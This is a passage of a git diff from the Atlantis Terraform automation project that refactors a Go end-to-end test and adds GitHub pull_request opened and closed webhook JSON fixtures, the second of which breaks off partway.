 		Locker: lockingClient,
 	}
+	atlantisWorkspace := &events.FileWorkspace{
+		DataDir:                 dataDir,
+		TestingOverrideCloneURL: testRepoDir,
+	}
 
 	defaultTFVersion := terraformClient.Version()
 	commandHandler := &events.CommandHandler{
@@ -85,7 +180,7 @@ func Test(t *testing.T) {
 			ParserValidator:   &yaml.ParserValidator{},
 			ProjectFinder:     &events.DefaultProjectFinder{},
 			VCSClient:         e2eVCSClient,
-			Workspace:         e2eWorkspace,
+			Workspace:         atlantisWorkspace,
 			ProjectOperator: events.ProjectOperator{
 				Locker:           projectLocker,
 				LockURLGenerator: &mockLockURLGenerator{},
@@ -104,16 +199,20 @@ func Test(t *testing.T) {
 				ApprovalOperator: runtime.ApprovalOperator{
 					VCSClient: e2eVCSClient,
 				},
-				Workspace: e2eWorkspace,
+				Workspace: atlantisWorkspace,
 				Webhooks:  &mockWebhookSender{},
 			},
 		},
 	}
 
 	ctrl := server.EventsController{
-		TestingMode:            true,
-		CommandRunner:          commandHandler,
-		PullCleaner:            nil,
+		TestingMode:   true,
+		CommandRunner: commandHandler,
+		PullCleaner: &events.PullClosedExecutor{
+			Locker:    lockingClient,
+			VCSClient: e2eVCSClient,
+			Workspace: atlantisWorkspace,
+		},
 		Logger:                 logger,
 		Parser:                 eventParser,
 		CommentParser:          commentParser,
@@ -133,32 +232,7 @@ func Test(t *testing.T) {
 			Username: "atlantisbot",
 		},
 	}
-
-	// Test GitHub Post
-	req := GitHubCommentEvent(t, "atlantis plan")
-	w := httptest.NewRecorder()
-	When(e2eGithubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil)
-	testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple")
-	Ok(t, err)
-	When(e2eWorkspace.Clone(matchers.AnyPtrToLoggingSimpleLogger(), AnyRepo(), AnyRepo(), matchers.AnyModelsPullRequest(), AnyString())).ThenReturn(testRepoDir, nil)
-	// Clean up .terraform and plan files when we're done.
-	defer func() {
-		os.RemoveAll(filepath.Join(testRepoDir, ".terraform"))
-		planFiles, _ := filepath.Glob(testRepoDir + "/*.tfplan")
-		for _, file := range planFiles {
-			os.Remove(file)
-		}
-	}()
-
-	ctrl.Post(w, req)
-	responseContains(t, w, 200, "Processing...")
-	_, _, comment := e2eVCSClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
-
-	exp, err := ioutil.ReadFile(filepath.Join(testRepoDir, "exp-output-atlantis-plan.txt"))
-	fmt.Println((string(exp)))
-	Ok(t, err)
-
-	Equals(t, string(exp), comment)
+	return ctrl, e2eVCSClient, e2eGithubGetter, atlantisWorkspace
 }
 
 type mockLockURLGenerator struct{}
@@ -184,6 +258,26 @@ func GitHubCommentEvent(t *testing.T, comment string) *http.Request {
 	return req
 }
 
+func GitHubPullRequestOpenedEvent(t *testing.T) *http.Request {
+	requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestOpenedEvent.json"))
+	Ok(t, err)
+	req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON))
+	Ok(t, err)
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set(githubHeader, "pull_request")
+	return req
+}
+
+func GitHubPullRequestClosedEvent(t *testing.T) *http.Request {
+	requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubPullRequestClosedEvent.json"))
+	Ok(t, err)
+	req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON))
+	Ok(t, err)
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set(githubHeader, "pull_request")
+	return req
+}
+
 func GitHubPullRequestParsed() *github.PullRequest {
 	return &github.PullRequest{
 		Number:  github.Int(1),
diff --git a/server/testfixtures/githubPullRequestClosedEvent.json b/server/testfixtures/githubPullRequestClosedEvent.json
new file mode 100644
index 0000000000..1fd568761e
--- /dev/null
+++ b/server/testfixtures/githubPullRequestClosedEvent.json
@@ -0,0 +1,468 @@
+{
+  "action": "closed",
+  "number": 1,
+  "pull_request": {
+    "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1",
+    "id": 193308707,
+    "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3",
+    "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1",
+    "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff",
+    "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch",
+    "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1",
+    "number": 1,
+    "state": "closed",
+    "locked": false,
+    "title": "Add new project layouts",
+    "user": {
+      "login": "runatlantis",
+      "id": 1034429,
+      "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+      "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+      "gravatar_id": "",
+      "url": "https://api.github.com/users/runatlantis",
+      "html_url": "https://github.com/runatlantis",
+      "followers_url": "https://api.github.com/users/runatlantis/followers",
+      "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+      "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+      "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+      "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+      "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+      "repos_url": "https://api.github.com/users/runatlantis/repos",
+      "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+      "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+      "type": "User",
+      "site_admin": false
+    },
+    "body": "",
+    "created_at": "2018-06-07T12:45:41Z",
+    "updated_at": "2018-06-16T16:55:19Z",
+    "closed_at": "2018-06-16T16:55:19Z",
+    "merged_at": null,
+    "merge_commit_sha": "e96e1cea0d79f4ff07845060ade0b21ff1ffe37f",
+    "assignee": null,
+    "assignees": [
+
+    ],
+    "requested_reviewers": [
+
+    ],
+    "requested_teams": [
+
+    ],
+    "labels": [
+
+    ],
+    "milestone": null,
+    "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits",
+    "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments",
+    "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}",
+    "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments",
+    "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e",
+    "head": {
+      "label": "runatlantis:atlantisyaml",
+      "ref": "atlantisyaml",
+      "sha": "5e2d140b2d74bf61675677f01dc947ae8512e18e",
+      "user": {
+        "login": "runatlantis",
+        "id": 1034429,
+        "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+        "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+        "gravatar_id": "",
+        "url": "https://api.github.com/users/runatlantis",
+        "html_url": "https://github.com/runatlantis",
+        "followers_url": "https://api.github.com/users/runatlantis/followers",
+        "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+        "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+        "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+        "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+        "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+        "repos_url": "https://api.github.com/users/runatlantis/repos",
+        "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+        "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+        "type": "User",
+        "site_admin": false
+      },
+      "repo": {
+        "id": 136474117,
+        "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+        "name": "atlantis-tests",
+        "full_name": "runatlantis/atlantis-tests",
+        "owner": {
+          "login": "runatlantis",
+          "id": 1034429,
+          "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+          "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+          "gravatar_id": "",
+          "url": "https://api.github.com/users/runatlantis",
+          "html_url": "https://github.com/runatlantis",
+          "followers_url": "https://api.github.com/users/runatlantis/followers",
+          "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+          "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+          "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+          "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+          "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+          "repos_url": "https://api.github.com/users/runatlantis/repos",
+          "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+          "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+          "type": "User",
+          "site_admin": false
+        },
+        "private": false,
+        "html_url": "https://github.com/runatlantis/atlantis-tests",
+        "description": "A set of terraform projects that atlantis e2e tests run on.",
+        "fork": true,
+        "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+        "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+        "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+        "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+        "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+        "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+        "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+        "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+        "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+        "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+        "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+        "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+        "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+        "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+        "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+        "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+        "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+        "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+        "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+        "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+        "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+        "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+        "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+        "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+        "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+        "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+        "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+        "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+        "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+        "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+        "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+        "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+        "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+        "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+        "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+        "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+        "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+        "created_at": "2018-06-07T12:28:23Z",
+        "updated_at": "2018-06-07T12:28:27Z",
+        "pushed_at": "2018-06-11T16:22:17Z",
+        "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+        "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+        "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+        "svn_url": "https://github.com/runatlantis/atlantis-tests",
+        "homepage": null,
+        "size": 8,
+        "stargazers_count": 0,
+        "watchers_count": 0,
+        "language": "HCL",
+        "has_issues": false,
+        "has_projects": true,
+        "has_downloads": true,
+        "has_wiki": false,
+        "has_pages": false,
+        "forks_count": 0,
+        "mirror_url": null,
+        "archived": false,
+        "open_issues_count": 1,
+        "license": {
+          "key": "other",
+          "name": "Other",
+          "spdx_id": null,
+          "url": null,
+          "node_id": "MDc6TGljZW5zZTA="
+        },
+        "forks": 0,
+        "open_issues": 1,
+        "watchers": 0,
+        "default_branch": "master"
+      }
+    },
+    "base": {
+      "label": "runatlantis:master",
+      "ref": "master",
+      "sha": "f59a822e83b3cd193142c7624ea635a5d7894388",
+      "user": {
+        "login": "runatlantis",
+        "id": 1034429,
+        "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+        "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+        "gravatar_id": "",
+        "url": "https://api.github.com/users/runatlantis",
+        "html_url": "https://github.com/runatlantis",
+        "followers_url": "https://api.github.com/users/runatlantis/followers",
+        "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+        "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+        "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+        "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+        "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+        "repos_url": "https://api.github.com/users/runatlantis/repos",
+        "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+        "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+        "type": "User",
+        "site_admin": false
+      },
+      "repo": {
+        "id": 136474117,
+        "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+        "name": "atlantis-tests",
+        "full_name": "runatlantis/atlantis-tests",
+        "owner": {
+          "login": "runatlantis",
+          "id": 1034429,
+          "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+          "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+          "gravatar_id": "",
+          "url": "https://api.github.com/users/runatlantis",
+          "html_url": "https://github.com/runatlantis",
+          "followers_url": "https://api.github.com/users/runatlantis/followers",
+          "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+          "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+          "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+          "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+          "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+          "repos_url": "https://api.github.com/users/runatlantis/repos",
+          "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+          "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+          "type": "User",
+          "site_admin": false
+        },
+        "private": false,
+        "html_url": "https://github.com/runatlantis/atlantis-tests",
+        "description": "A set of terraform projects that atlantis e2e tests run on.",
+        "fork": true,
+        "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+        "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+        "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+        "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+        "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+        "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+        "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+        "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+        "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+        "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+        "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+        "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+        "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+        "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+        "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+        "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+        "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+        "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+        "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+        "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+        "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+        "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+        "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+        "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+        "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+        "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+        "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+        "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+        "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+        "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+        "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+        "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+        "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+        "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+        "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+        "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+        "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+        "created_at": "2018-06-07T12:28:23Z",
+        "updated_at": "2018-06-07T12:28:27Z",
+        "pushed_at": "2018-06-11T16:22:17Z",
+        "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+        "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+        "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+        "svn_url": "https://github.com/runatlantis/atlantis-tests",
+        "homepage": null,
+        "size": 8,
+        "stargazers_count": 0,
+        "watchers_count": 0,
+        "language": "HCL",
+        "has_issues": false,
+        "has_projects": true,
+        "has_downloads": true,
+        "has_wiki": false,
+        "has_pages": false,
+        "forks_count": 0,
+        "mirror_url": null,
+        "archived": false,
+        "open_issues_count": 1,
+        "license": {
+          "key": "other",
+          "name": "Other",
+          "spdx_id": null,
+          "url": null,
+          "node_id": "MDc6TGljZW5zZTA="
+        },
+        "forks": 0,
+        "open_issues": 1,
+        "watchers": 0,
+        "default_branch": "master"
+      }
+    },
+    "_links": {
+      "self": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1"
+      },
+      "html": {
+        "href": "https://github.com/runatlantis/atlantis-tests/pull/1"
+      },
+      "issue": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1"
+      },
+      "comments": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments"
+      },
+      "review_comments": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/comments"
+      },
+      "review_comment": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}"
+      },
+      "commits": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1/commits"
+      },
+      "statuses": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/5e2d140b2d74bf61675677f01dc947ae8512e18e"
+      }
+    },
+    "author_association": "OWNER",
+    "merged": false,
+    "mergeable": true,
+    "rebaseable": true,
+    "mergeable_state": "clean",
+    "merged_by": null,
+    "comments": 62,
+    "review_comments": 0,
+    "maintainer_can_modify": false,
+    "commits": 3,
+    "additions": 198,
+    "deletions": 8,
+    "changed_files": 24
+  },
+  "repository": {
+    "id": 136474117,
+    "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+    "name": "atlantis-tests",
+    "full_name": "runatlantis/atlantis-tests",
+    "owner": {
+      "login": "runatlantis",
+      "id": 1034429,
+      "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+      "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+      "gravatar_id": "",
+      "url": "https://api.github.com/users/runatlantis",
+      "html_url": "https://github.com/runatlantis",
+      "followers_url": "https://api.github.com/users/runatlantis/followers",
+      "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+      "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+      "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+      "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+      "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+      "repos_url": "https://api.github.com/users/runatlantis/repos",
+      "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+      "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+      "type": "User",
+      "site_admin": false
+    },
+    "private": false,
+    "html_url": "https://github.com/runatlantis/atlantis-tests",
+    "description": "A set of terraform projects that atlantis e2e tests run on.",
+    "fork": true,
+    "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+    "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+    "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+    "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+    "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+    "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+    "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+    "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+    "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+    "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+    "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+    "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+    "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+    "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+    "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+    "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+    "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+    "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+    "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+    "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+    "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+    "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+    "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+    "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+    "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+    "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+    "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+    "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+    "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+    "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+    "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+    "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+    "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+    "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+    "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+    "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+    "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+    "created_at": "2018-06-07T12:28:23Z",
+    "updated_at": "2018-06-07T12:28:27Z",
+    "pushed_at": "2018-06-11T16:22:17Z",
+    "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+    "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+    "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+    "svn_url": "https://github.com/runatlantis/atlantis-tests",
+    "homepage": null,
+    "size": 8,
+    "stargazers_count": 0,
+    "watchers_count": 0,
+    "language": "HCL",
+    "has_issues": false,
+    "has_projects": true,
+    "has_downloads": true,
+    "has_wiki": false,
+    "has_pages": false,
+    "forks_count": 0,
+    "mirror_url": null,
+    "archived": false,
+    "open_issues_count": 1,
+    "license": {
+      "key": "other",
+      "name": "Other",
+      "spdx_id": null,
+      "url": null,
+      "node_id": "MDc6TGljZW5zZTA="
+    },
+    "forks": 0,
+    "open_issues": 1,
+    "watchers": 0,
+    "default_branch": "master"
+  },
+  "sender": {
+    "login": "runatlantis",
+    "id": 1034429,
+    "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+    "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+    "gravatar_id": "",
+    "url": "https://api.github.com/users/runatlantis",
+    "html_url": "https://github.com/runatlantis",
+    "followers_url": "https://api.github.com/users/runatlantis/followers",
+    "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+    "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+    "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+    "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+    "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+    "repos_url": "https://api.github.com/users/runatlantis/repos",
+    "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+    "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+    "type": "User",
+    "site_admin": false
+  }
+}
\ No newline at end of file
diff --git a/server/testfixtures/githubPullRequestOpenedEvent.json b/server/testfixtures/githubPullRequestOpenedEvent.json
new file mode 100644
index 0000000000..0b969438ec
--- /dev/null
+++ b/server/testfixtures/githubPullRequestOpenedEvent.json
@@ -0,0 +1,468 @@
+{
+  "action": "opened",
+  "number": 2,
+  "pull_request": {
+    "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2",
+    "id": 194034250,
+    "node_id": "MDExOlB1bGxSZXF1ZXN0MTk0MDM0MjUw",
+    "html_url": "https://github.com/runatlantis/atlantis-tests/pull/2",
+    "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/2.diff",
+    "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/2.patch",
+    "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2",
+    "number": 2,
+    "state": "open",
+    "locked": false,
+    "title": "Noyaml",
+    "user": {
+      "login": "runatlantis",
+      "id": 1034429,
+      "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+      "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+      "gravatar_id": "",
+      "url": "https://api.github.com/users/runatlantis",
+      "html_url": "https://github.com/runatlantis",
+      "followers_url": "https://api.github.com/users/runatlantis/followers",
+      "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+      "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+      "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+      "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+      "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+      "repos_url": "https://api.github.com/users/runatlantis/repos",
+      "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+      "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+      "type": "User",
+      "site_admin": false
+    },
+    "body": "",
+    "created_at": "2018-06-11T16:22:16Z",
+    "updated_at": "2018-06-11T16:22:16Z",
+    "closed_at": null,
+    "merged_at": null,
+    "merge_commit_sha": null,
+    "assignee": null,
+    "assignees": [
+
+    ],
+    "requested_reviewers": [
+
+    ],
+    "requested_teams": [
+
+    ],
+    "labels": [
+
+    ],
+    "milestone": null,
+    "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits",
+    "review_comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments",
+    "review_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}",
+    "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments",
+    "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d",
+    "head": {
